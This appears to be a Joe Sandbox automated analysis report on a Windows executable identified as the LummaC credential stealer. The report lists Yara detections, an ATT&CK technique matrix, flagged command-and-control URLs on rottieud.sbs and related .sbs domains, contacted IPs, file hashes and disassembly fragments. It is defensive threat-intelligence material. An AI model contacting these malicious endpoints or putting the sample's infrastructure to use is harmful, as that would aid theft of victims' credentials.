Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1891820407.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7812, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: gFCeeWNTvZ.exe PID: 7564, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	41 Input Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	41 Input Capture	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gFCeeWNTvZ.exe	8%	ReversingLabs
gFCeeWNTvZ.exe	11%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
rottieud.sbs	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://rottieud.sbs/apix	100%	Avira URL Cloud	malware
https://rottieud.sbs/apiDUv	100%	Avira URL Cloud	malware
https://rottieud.sbs/api	100%	Avira URL Cloud	malware
https://rottieud.sbs/apid1	100%	Avira URL Cloud	malware
https://rottieud.sbs/ckz	100%	Avira URL Cloud	malware
https://rottieud.sbs/apipf	100%	Avira URL Cloud	malware
https://rottieud.sbs/g	100%	Avira URL Cloud	malware
https://rottieud.sbs/&	100%	Avira URL Cloud	malware
https://rottieud.sbs/apiaHD	100%	Avira URL Cloud	malware
https://rottieud.sbs/api	6%	Virustotal		Browse
https://rottieud.sbs/h	100%	Avira URL Cloud	malware
https://rottieud.sbs/	100%	Avira URL Cloud	malware
https://rottieud.sbs:443/apitPd	100%	Avira URL Cloud	malware
https://rottieud.sbs/apies	100%	Avira URL Cloud	malware
https://rottieud.sbs/1	100%	Avira URL Cloud	malware
https://rottieud.sbs/-	100%	Avira URL Cloud	malware
https://rottieud.sbs/apili	100%	Avira URL Cloud	malware
https://rottieud.sbs/z	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rottieud.sbs	104.21.73.211	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rottieud.sbs	false		high
tamedgeesy.sbs	false		high
repostebhu.sbs	false		high
thinkyyokej.sbs	false		high
ducksringjk.sbs	false		high
https://rottieud.sbs/api	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
brownieyuz.sbs	false		high
relalingj.sbs	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/apiDUv	BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/apid1	BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/apix	BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/ckz	BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/go-sql-driver/mysql/wiki/old_passwordsA	gFCeeWNTvZ.exe	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/apipf	BitLockerToGo.exe, 00000002.00000003.1953178352.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949408201.0000000000B25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/g	BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/&	BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/apiaHD	BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/h	BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/	BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs:443/apitPd	BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000002.00000003.1919623503.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/apies	BitLockerToGo.exe, 00000002.00000003.1953761551.0000000000B25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/1	BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	BitLockerToGo.exe, 00000002.00000003.1891525862.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 00000002.00000003.1918064678.0000000004DF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/-	BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1960004462.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1978005640.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000002.00000003.1919119297.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BitLockerToGo.exe, 00000002.00000003.1891941766.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1892026100.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rottieud.sbs/apili	BitLockerToGo.exe, 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rottieud.sbs/z	BitLockerToGo.exe, 00000002.00000002.1985066135.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.73.211	rottieud.sbs	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553058
Start date and time:	2024-11-10 09:26:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gFCeeWNTvZ.exe renamed because original name is a hash value
Original Sample Name:	49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 35 Number of non-executed functions: 125
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:27:19	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse	104.21.39.3
	S0ZPuRIptr.exe	Get hash	malicious	LummaC, PrivateLoader	Browse	104.21.52.218
	Z8K4jt1j2H.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	OtherBahamas.exe	Get hash	malicious	LummaC	Browse	104.21.32.85
	sftpc.exe	Get hash	malicious	LummaC	Browse	172.67.133.193
	but3.ps1	Get hash	malicious	LummaC	Browse	104.21.14.17
	alarmer.exe	Get hash	malicious	LummaC	Browse	172.67.204.91
	dIF7VJ7GTG.exe	Get hash	malicious	LummaC	Browse	104.21.14.17
	kSBJ8j8jCy.exe	Get hash	malicious	LummaC	Browse	104.21.39.3
	WcK7T10TPc.exe	Get hash	malicious	LummaC	Browse	172.67.141.179

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse	104.21.73.211
	S0ZPuRIptr.exe	Get hash	malicious	LummaC, PrivateLoader	Browse	104.21.73.211
	Z8K4jt1j2H.exe	Get hash	malicious	LummaC	Browse	104.21.73.211
	OtherBahamas.exe	Get hash	malicious	LummaC	Browse	104.21.73.211
	sftpc.exe	Get hash	malicious	LummaC	Browse	104.21.73.211
	but3.ps1	Get hash	malicious	LummaC	Browse	104.21.73.211
	alarmer.exe	Get hash	malicious	LummaC	Browse	104.21.73.211
	dIF7VJ7GTG.exe	Get hash	malicious	LummaC	Browse	104.21.73.211
	kSBJ8j8jCy.exe	Get hash	malicious	LummaC	Browse	104.21.73.211
	WcK7T10TPc.exe	Get hash	malicious	LummaC	Browse	104.21.73.211

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll

Download File

Process:	C:\Users\user\Desktop\gFCeeWNTvZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1133967
Entropy (8bit):	6.2621593785107486
Encrypted:	false
SSDEEP:	12288:+a8Fde9YR/HHeL8ty/dqBHmShQqNHxhy4pDKP7BXUB:+NFbd9thHBQqNRhy4pDKtM
MD5:	4EC2D5A48D44C814F6AD68011E83A32B
SHA1:	881A6E610EF0B1DDD7BAE3C00A123C895E3DA570
SHA-256:	93CE68219CB0E920A0B9F04A38BBEFF104F530A643FD0A792215572525869F90
SHA-512:	FCA67E744FA535AE92C17AEF16DA3CA2FA58811DE0BACB97BA73E716DBDC62CAA1EE43D957E90C9FC93E6BC366EDACCD6D3FF60AE1182F1384BB0B4AE5DCCB07
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........*..b......!...".....L...$...........0....`d................................=......... ......................`.......p..x...........................................................t&...................... s...............................text...$...........................`.P`.data........0......................@.`..rdata.......@.......$..............@.`@.bss.... "...0........................`..edata.......`......................@.0@.idata..x....p......."..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B/4...................R..............@.@B/19.....c............X..............@..B/31......p.......r...n..............@..B/45..... ...........................@..B/57......>.......@..................@.0B/70......Z.......\..................@..B/81.......... .......t..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.984665883278457
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gFCeeWNTvZ.exe
File size:	48'627'712 bytes
MD5:	f04f7352cba3579ff18e50534f6a14d4
SHA1:	e5269c148e62f81a41cdc7144964046fdbd8fc4c
SHA256:	49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d
SHA512:	1d0fb8c5f916d0ab63bb9feef147d9ce3733b7e54c8b430e911ff83171b7465420d2c9e2746dafb15e3f1d73da8f27987d3ab625774e865613502e62e1113b0a
SSDEEP:	196608:X0N+0XdbnfS485s+VmLBWfRKjHihheroWyoJoXK:5yScbLBWfg0+J
TLSH:	70B74B40F9EB54F6DA03183444ABA2BF23347E058B25CBCBD6047F5AE837AE21937559
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................................p........P....@.......................................@................................

File Icon


Icon Hash:	92ecd292964c6cc6

Static PE Info

General

Entrypoint:	0x46d270
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	ff9f3a86709796c17211f9df12aae74d

Entrypoint Preview

Instruction
jmp 00007F70F0E411E0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007F70F0E43519h
mov eax, 00000000h
jmp 00007F70F0E43576h
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007F70F0E43517h
call 00007F70F0E43609h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007F70F0E4352Ah
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
mov edx, dword ptr [ecx]
mov eax, esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10e2000	0x410	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1150000	0xffb7	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10e3000	0x6b06c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xfa9020	0xa8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7fe4b5	0x7fe600	79e658fe95394aed77b248fbaf855473	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x800000	0x7a4d00	0x7a4e00	7f52f05ece67ae17f71771da4418f357	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xfa5000	0x13c4ac	0xfb400	91df303a2b0fc6fb43457cc6dc698213	False	0.6044397154850746	data	6.422139710094485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x10e2000	0x410	0x600	e5b9fb9b83ea7d2631f7a1be3333ed95	False	0.3372395833333333	data	3.8750465305059865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x10e3000	0x6b06c	0x6b200	0e220ed68b79528f1ef2b5a72b088f92	False	0.5035507219953326	data	6.620939774557823	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x114f000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x1150000	0xffb7	0x10000	83eeb58e31bb1020c8b95e307afebbe1	False	0.8391876220703125	data	7.487262228849337	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1150254	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.7446808510638298
RT_ICON	0x11506bc	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352			0.5295992714025501
RT_ICON	0x11517e4	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792			0.42005695687550854
RT_ICON	0x1153e4c	0xb921	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9754394108834638
RT_GROUP_ICON	0x115f770	0x3e	data			0.8064516129032258
RT_VERSION	0x115f7b0	0x408	data	English	United States	0.4699612403100775
RT_MANIFEST	0x115fbb8	0x3ff	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.43010752688172044

Imports

DLL

Import

kernel32.dll

